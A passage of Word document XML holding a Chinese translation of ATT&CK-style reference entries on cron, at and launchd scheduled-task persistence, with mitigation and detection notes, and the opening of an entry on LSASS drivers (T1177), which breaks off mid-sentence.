              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B642D8">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218798BE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>Anastasios Pingios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69FB6E76" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B7DF8D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABFDD37" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>inux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>acOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统中，有很多方法支持创建预计划和周期性的后台任务：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>ron, at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>aunchd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统的计划任务不同，在基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>inux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统中的任务调度默认无法远程执行，除非结合建立的远程会话使用，比如：安全的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D967F18" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619675B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装系统级的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务可通过修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/etc/cron.d/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>ron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台程序支持的其它位置，安装用户级的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务可通过使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合特定格式化的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642EB795" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些方式允许命令或者脚本以特定的周期性间隔在后台执行，无需用户交互。攻击者可能在系统启动或者时使用任务调度或者预计划的持久化技术，进而来实施部分横向移动执行，获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限，或者特定账号上下文下运行进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F45C19E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6221B937" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>OSIX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中，包括：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>acOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序是另一种计划程序或者脚本任务以延迟执行的方式，同样也能达到相同的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CB65B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>launchd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10093B07" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>aunch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>aunch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理技术，每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>aunchd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务通过不同的配置属性列表（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来描述，只是有个额外的带有时间属性字典的</w:t>
      </w:r>
      <w:r>
        <w:t>StartCalendarInterval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。这个方式仅能在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>acOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>S X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A3B75" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="6D57105B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6837CF05" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="400DD2A6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="3436293F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="401B5C09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00800DCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74A68B2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00800DCC">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
            <w:r w:rsidRPr="00800DCC">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element-highlighted"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00800DCC">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>使用组策略创建启动代理的能力</w:t>
            </w:r>
            <w:r w:rsidRPr="00800DCC">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CD91EF2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:leftChars="0" w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5084E136" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000C1D1F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:leftChars="0" w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C0B068" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3C4CD0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00763C19" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在安装新软件或者通过管理功能时可能会创建合法的计划任务。可通过相应工具列举任务详情来监控这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>aunched</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务。可通过监控进程执行结果来查找异常或者位置的应用和行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075BA8E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D796D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSASS</w:t>
      </w:r>
      <w:r w:rsidRPr="008D796D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动程序</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="7E46FF39" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CCDDFB5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="003409A7">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1177</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710BEE5B" w14:textId="24387E5A" w:rsidR="000F2665" w:rsidRDefault="003409A7" w:rsidP="003409A7">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行，持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C3FD76" w14:textId="7DA94A20" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="003409A7">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidR="003409A7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06DF80FF" w14:textId="08F66A17" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="003409A7">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidR="00D32DF2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00D32DF2">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4764641E" w14:textId="62B71606" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="003409A7">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidR="003409A7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B642D8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00B642D8">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，动态链接库监控，文件监控，内核驱动，加载的动态链接库，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7161B68D" w14:textId="137BB59C" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="003409A7">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持远程</w:t>
            </w:r>
            <w:r w:rsidRPr="00422551">
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="003409A7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003409A7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CA52F64" w14:textId="1F87488F" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="003409A7">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00422551">
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="003409A7">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:t>Vincent Le Toux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7817E604" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="003409A7">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47E02DB9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66180AE3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4366944F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>安全子系统是用来管理和执行计算机或者域相关的安全策略的一套组件。本地安全认证（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）是负责本地安全策略和用户鉴权的主要组件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>包含多种关联其它安全方法的动态链接库（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LLs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>），这些都在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>子系统服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
